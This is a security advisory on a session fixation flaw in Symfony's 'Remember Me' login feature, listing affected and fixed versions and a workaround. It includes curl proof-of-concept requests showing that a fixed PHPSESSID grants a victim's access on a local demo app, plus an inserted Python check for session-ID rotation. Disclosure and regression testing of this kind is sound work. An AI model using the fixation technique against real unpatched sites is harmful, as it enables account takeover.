Symfony PHP Framework Session Fixation
Posted on 23 December 2015
Advisory: Symfony PHP Framework: Session Fixation In "Remember Me" Login Functionality

A session fixation vulnerability within the Symfony web application
framework's "Remember Me" login functionality allows an attacker to
impersonate the victim towards the web application if the session ID
value was previously known to the attacker.

Details
=======

Product: Symfony
Affected Versions: 2.3.0 - 2.3.34, 2.6.0 - 2.6.11, 2.7.0 - 2.7.6
Fixed Versions: 2.3.35, 2.6.12 and 2.7.7 [2]
Vulnerability Type: Session Fixation
Security Risk: low
Vendor URL: https://symfony.com/
Vendor Status: fixed version released [2]
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-013
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

"Symfony is a set of PHP Components, a Web Application framework, a
Philosophy, and a Community — all working together in harmony."
(from Symfony's homepage)

More Details
============

The following details are explained using the official Symfony Demo
application [0]. The "Remember Me" login functionality was activated
according to [1]. The security configuration file was modified as
follows:

-- app/config/security.yml ---------------------------------------------
security:
    [...]
    firewalls:
        secured_area:
            [...]
            remember_me:
                key: "IdOpAkToufatt8knawt{"
                lifetime: 604800
                path: /
                always_remember_me: true
------------------------------------------------------------------------

If the following URL is requested, the Symfony application redirects to
a login screen where a username and password must be supplied:

$ curl -I 'http://localhost:8000/en/admin/post/'
HTTP/1.1 302 Found
Host: localhost:8000
[...]
Set-Cookie: PHPSESSID=8a17gpfjtnfqfdhabthso92sk3; path=/
Location: http://localhost:8000/en/login

On submission, an HTTP POST request is performed by the browser:

POST /en/login_check HTTP/1.1
Host: localhost:8000
Referer: http://localhost:8000/en/login
Cookie: PHPSESSID=8a17gpfjtnfqfdhabthso92sk3
[...]

_username=anna_admin
&_password=kitten
&_csrf_token=h_s6ltxHB3gbGU--SIY6wLCUGf84bLmhs1_LGFEBsUI

If the supplied credentials are correct, the Symfony application
responds as follows:

HTTP/1.1 302 Found
Host: localhost:8000
Set-Cookie: PHPSESSID=vk2e3enjr0uafgonr0i3u2b4t5; path=/
Set-Cookie: REMEMBERME=QXBwQnVuZGxlXEVudGl0eVxVc2VyOllXNXVZVjloWkcxcGJnPT06MTQ0NjEyMTYzNDpmMDkxMzhiYzkzYjVmYTk1MTNlYWMyYzY2OTQ1NGU5Y2IwOWY0OWY3MTFhODNhMjUxNmU0OWE4Njg2MTVmNWRk; expires=Thu, 29-Oct-2015 12:27:14 GMT; Max-Age=604800;
Location: http://localhost:8000/en/admin/post/
[...]

The cookie PHPSESSID is set to a new value and a new cookie named
REMEMBERME is set in the client. The PHPSESSID is a session cookie only
and has a limited lifetime. In contrast, the REMEMBERME cookie has a
validity of one week. It allows users to stay logged in for longer than
the regular session lasts.

The REMEMBERME cookie's value consists of four data fields separated by
colons and is encoded in base64. The first data field references the
application's user object, followed by the base64-encoded username. The
third data field is a timestamp of the cookie's expiration date. The
last one is a MAC value to protect the other three against manipulation.
$ base64 -d <<< QXBwQnVuZGxlXEVudGl0eVxVc2VyOllXNXVZVjloWkcxcGJnPT06MTQ0NjEyMTYzNDpmMDkxMzhiYzkzYjVmYTk1MTNlYWMyYzY2OTQ1NGU5Y2IwOWY0OWY3MTFhODNhMjUxNmU0OWE4Njg2MTVmNWRk
AppBundle\Entity\User:YW5uYV9hZG1pbg==:1446121634:f09138bc[...]68615f5dd
$ base64 -d <<< YW5uYV9hZG1pbg==
anna_admin
$ date -d @1446121634
Thu Oct 29 13:27:14 CET 2015

Proof of Concept
================

If the following URL is requested with an unauthorised session ID, the
Symfony application redirects to the login page (as already shown
above):

$ curl -I 'http://localhost:8000/en/admin/post/' -b 'PHPSESSID=redteam'
HTTP/1.1 302 Found
Host: localhost:8000
Location: http://localhost:8000/en/login
[...]

In the case that a valid REMEMBERME cookie is included in the HTTP
request, the user is successfully authenticated:

$ curl -s -i 'http://localhost:8000/en/admin/post/' \
  -b 'PHPSESSID=redteam; REMEMBERME=QXBwQnVuZGxlXEVudGl0eVxVc2VyOllXNXVZ'\
'VjloWkcxcGJnPT06MTQ0NjEyMTYzNDpmMDkxMzhiYzkzYjVmYTk1MTNlYWMyYzY2OTQ1N'\
'GU5Y2IwOWY0OWY3MTFhODNhMjUxNmU0OWE4Njg2MTVmNWRk'
HTTP/1.1 200 OK
Host: localhost:8000
[...]
<!DOCTYPE html>
<html>
[...]
<tr>
  <td>In hac habitasse platea dictumst</td>
  <td>anna_admin@symfony.com</td>
  <td>8/23/15, 10:16 AM</td>
[...]

After this HTTP request, the PHPSESSID value suffices to authenticate
the user. In contrast to the regular login procedure, the web
application did not assign a new value to the PHPSESSID cookie. If an
attacker somehow got in possession of the cookie's value or has
successfully set a given cookie value in the user's browser at some
point in the past, the attacker is now able to access the web
application with the user's permissions:

$ curl -s -i 'http://localhost:8000/en/admin/post/' -b 'PHPSESSID=redteam'
HTTP/1.1 200 OK
Host: localhost:8000
[...]
<!DOCTYPE html>
<html>
[...]
<tr>
  <td>In hac habitasse platea dictumst</td>
  <td>anna_admin@symfony.com</td>
  <td>8/23/15, 10:16 AM</td>
[...]
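The cookie layout and the missing session-ID rotation described above, checked programmatically. This is an added Python example, not code from the advisory or from Symfony: it decodes the REMEMBERME value captured above into the four fields the advisory describes (the MAC is left unverified, since the advisory does not state its algorithm or inputs) and flags an authenticating response that does not replace the session cookie the client sent, which is the condition the proof of concept shows. The request and response headers it runs over are constructed from the exchanges above.

```python
import base64

# REMEMBERME value captured in the advisory above (wrapped there, joined here).
REMEMBERME = (
    "QXBwQnVuZGxlXEVudGl0eVxVc2VyOllXNXVZVjloWkcxcGJnPT06MTQ0NjEyMTYzNDpmMDkxMzhi"
    "YzkzYjVmYTk1MTNlYWMyYzY2OTQ1NGU5Y2IwOWY0OWY3MTFhODNhMjUxNmU0OWE4Njg2MTVmNWRk"
)


def parse_rememberme(value):
    """Decode the four colon-separated fields the advisory describes.

    The MAC is returned as-is: the advisory does not specify its algorithm
    or inputs, so it is not verified here."""
    padded = value + "=" * (-len(value) % 4)  # tolerate stripped base64 padding
    user_class, b64_user, expires, mac = base64.b64decode(padded).decode().split(":")
    return {
        "user_class": user_class,
        "username": base64.b64decode(b64_user).decode(),
        "expires": int(expires),  # Unix timestamp of the cookie's expiry
        "mac": mac,
    }


def parse_cookie_header(header):
    """Turn a request 'Cookie:' value ('a=1; b=2') into a dict."""
    return dict(p.strip().split("=", 1) for p in header.split(";") if "=" in p)


def session_id_rotated(request_cookie, set_cookie_headers, name="PHPSESSID"):
    """True if the response replaced the session cookie the client sent.

    False means the pre-authentication session ID stayed valid after the
    user was authenticated, which is the fixation condition shown above."""
    before = parse_cookie_header(request_cookie).get(name)
    after = None
    for header in set_cookie_headers:
        cookie_name, _, rest = header.partition("=")
        if cookie_name.strip() == name:
            after = rest.split(";", 1)[0]
    return after is not None and after != before


if __name__ == "__main__":
    # Sample headers constructed from the exchanges in the advisory.
    fields = parse_rememberme(REMEMBERME)
    print(fields["user_class"], fields["username"], fields["expires"])
    # Regular login: PHPSESSID 8a17... is replaced by vk2e... -> rotated (True).
    print(session_id_rotated("PHPSESSID=8a17gpfjtnfqfdhabthso92sk3",
                             ["PHPSESSID=vk2e3enjr0uafgonr0i3u2b4t5; path=/"]))
    # Remember-me login: no new PHPSESSID is set -> fixation (False).
    print(session_id_rotated("PHPSESSID=redteam; REMEMBERME=" + REMEMBERME, []))
```

Run against a live login flow, the same check is what a regression test for this issue would assert: the first authenticated response must set a PHPSESSID that differs from the one the client sent.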
Workaround
==========

Disable the "Remember Me" login functionality within the configuration
file security.yml.

Fix
===

Upgrade to a fixed version if possible, otherwise refer to section
Workaround.

Security Risk
=============

The described vulnerability allows an attacker to access a Symfony web
application with the attacked user's permissions. The attack requires
that the "Remember Me" login functionality is used by the application.
Additionally, the attacker must either have obtained the PHPSESSID
cookie value or have successfully set a value of their choosing in the
user's browser. Because of these requirements, the described
vulnerability poses a low risk only. The risk estimation may be
increased to medium or high based on the affected web application and
the accessible data.

Timeline
========

2015-09-11 Vulnerability identified
2015-09-16 Customer approved disclosure to vendor
2015-10-27 Vendor notified
2015-11-23 Fixed by vendor [2]
2015-12-22 Advisory released

References
==========

[0] https://github.com/symfony/symfony-demo
[1] https://symfony.com/doc/current/cookbook/security/remember_me.html
[2] https://symfony.com/blog/cve-2015-8124-session-fixation-in-the-remember-me-login-feature

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants
to share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

--
RedTeam Pentesting GmbH                  Tel.: +49 241 510081-0
Dennewartstr. 25-27                      Fax : +49 241 510081-99
52068 Aachen                             https://www.redteam-pentesting.de
Germany                                  Registergericht: Aachen HRB 14004
                                         Geschäftsführer: Patrick Hof, Jens Liebchen